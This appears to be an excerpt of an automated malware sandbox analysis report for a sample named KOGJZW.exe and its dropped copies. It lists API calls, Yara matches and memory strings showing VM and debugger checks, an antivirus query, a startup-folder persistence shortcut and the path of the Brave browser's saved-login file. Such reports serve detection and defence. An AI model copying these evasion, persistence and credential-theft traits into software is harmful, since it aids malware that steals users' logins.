Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Window / User API: threadDelayed 4937			Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Window / User API: foregroundWindowGot 1336			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_2-68167

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	API coverage: 6.7 %
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	API coverage: 3.9 %

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe TID: 7860	Thread sleep time: -49370s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3048	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3048	Thread sleep time: -3540000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8596	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Last function: Thread delayed
Source: C:\ProgramData\Synaptics\Synaptics.exe	Last function: Thread delayed
Source: C:\ProgramData\Synaptics\Synaptics.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Thread sleep count: Count: 4937 delay: -10

Jump to behavior

Source: Yara match	File source: 00000007.00000002.2594422072.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2593322500.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6128, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\WSFDII.vbs, type: DROPPED

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042DD92 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0042DD92
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00462044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00462044
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0046219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0046219F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0045F350
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_004624A9
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00456B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_00456B3F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045FD47 FindFirstFileW,FindClose,	2_2_0045FD47
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0045FDD2
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00456E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_00456E4A
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_003D2044
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_003D219F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	9_2_003CF350
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	9_2_003D24A9
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	9_2_003C6B3F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003CFD47 FindFirstFileW,FindClose,	9_2_003CFD47
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039DD92 GetFileAttributesW,FindFirstFileW,FindClose,	9_2_0039DD92
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	9_2_003CFDD2
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	9_2_003C6E4A

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0042E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_0042E47B

Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000

Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: KOGJZW.exe, 00000000.00000003.1335402421.0000000000716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: VZVDVH.exe, 00000014.00000003.1701752069.0000000001059000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: VZVDVH.exe, 00000015.00000002.1825131749.00000000011A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: KOGJZW.exe, 00000000.00000003.1335402421.0000000000716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596944962.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000050A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWJ
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601593603.0000000004166000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	API call chain: ExitProcess graph end node	graph_2-67483
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	API call chain: ExitProcess graph end node	graph_2-70869
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	API call chain: ExitProcess graph end node	graph_2-67284

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0046703C BlockInput,

2_2_0046703C

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0041374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

2_2_0041374E

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_004446D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

2_2_004446D0

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0057D0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_0057D0C0

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0044B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

2_2_0044B398

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00438E19 SetUnhandledExceptionFilter,	2_2_00438E19
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00438E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00438E3C
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_003A8E3C
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A8E19 SetUnhandledExceptionFilter,	9_2_003A8E19

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0044BE95 LogonUserW,

2_2_0044BE95

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0041374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

2_2_0041374E

Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <select * from antivirusproduct	memstr_aaa23ea2-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "c:\users\user\appdata\roaming\windata\"\	memstr_8fd14451-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\bravesoftware\brave-browser\user data\default\login data	memstr_581aeff6-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1&vp1&v\1&v	memstr_5be31635-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}	memstr_e7cbaab0-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\wsfdii.lnk	memstr_7fda3fc6-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{d3162b92-9365-467a-956b-92703aca08af}"	memstr_c19dde59-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{24ad3ad4-a569-4530-98e1-ab02f9417aa8}p	memstr_ba6c0d11-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21813	memstr_6ac82095-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fowh	memstr_59fd679b-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i	memstr_bd1e973e-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _users	memstr_8a3ecf4a-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ra7h813	memstr_e80c016e-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cr6qok	memstr_421dd5ae-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p8fq5xo5b	memstr_889864ed-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: deskt	memstr_d338bebb-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: osversionl,-217	memstr_de53b9c1-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c	memstr_6b1bdfa3-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x1ew\|	memstr_b5800787-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e1fd2yj5wh2q	memstr_b1272ef8-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @shell3	memstr_d1ca2a01-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qhel	memstr_f41a48f8-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m8kf1vp3sm5t%	memstr_75c4fd8b-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hontxont*	memstr_186399f1-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c0ch5pr5hhontxont*	memstr_e0ad22d5-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nthnnt/	memstr_904975a7-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wn8fnthnnt/	memstr_09ea005a-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cy5znt	memstr_d141af3d-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c^	memstr_38318ee6-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z8hu4yw0cy5zc	memstr_4ab87dc2-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t7xq5qc2u	memstr_f01854a9-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wh2qm	memstr_fe089a66-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p5gg0qk0t	memstr_93e1b2cd-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qntw	memstr_13b19132-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z4gg0ut2e\|	memstr_d0b24ecd-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fa	memstr_3e011a65-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yx1	memstr_6f646b3b-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e6ak8kt8ra7h	memstr_469cd7a8-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f@sh	memstr_42746a0a-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q	memstr_e6170d3b-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n4pt9qe2ik3c~1	memstr_779d5e39-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ik3cp@	memstr_daed3c7d-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -21769	memstr_ddc67af6-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: users	memstr_b45380f9-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eq9musers	memstr_4b09f491-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c:	memstr_e17e95fe-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ell32.dl	memstr_dfae994b-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m7uq1xi3eq9mbrok	memstr_50096569-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m4wq1ao6n	memstr_cac8b8ae-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z7ya7my2wy(s	memstr_4f4e117e-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: desktop	memstr_d22eac28-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i>	memstr_9d0cadcf-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cr6q32.dll,	memstr_ddec7514-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .exea	memstr_c3c7311e-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730730m211730691m211730705m211730698m211730733m211730731m211730726m211730734m211730699m211730705m21173071021n	memstr_d77108bf-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w	memstr_43d38197-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_rqhhql_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k	memstr_cf122a4a-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nt$nnt	memstr_2c801797-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o4ks5nn4c6qnt$nnt	memstr_c1eedfe7-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qnt	memstr_e0f0ae67-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cr6qnt	memstr_e267ee7a-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: u6yt2fg9kr1p	memstr_3dd357d2-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e8dy0nw4ek2z	memstr_12362ba8-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m9cm0cq0bv8i&	memstr_34edbf9e-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ih/	memstr_c9df6852-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x1ew\|	memstr_f0f3c026-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p8hl2ks2gshell33	memstr_4c85946f-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s5ba5xj4jp8t	memstr_1e708ae5-1
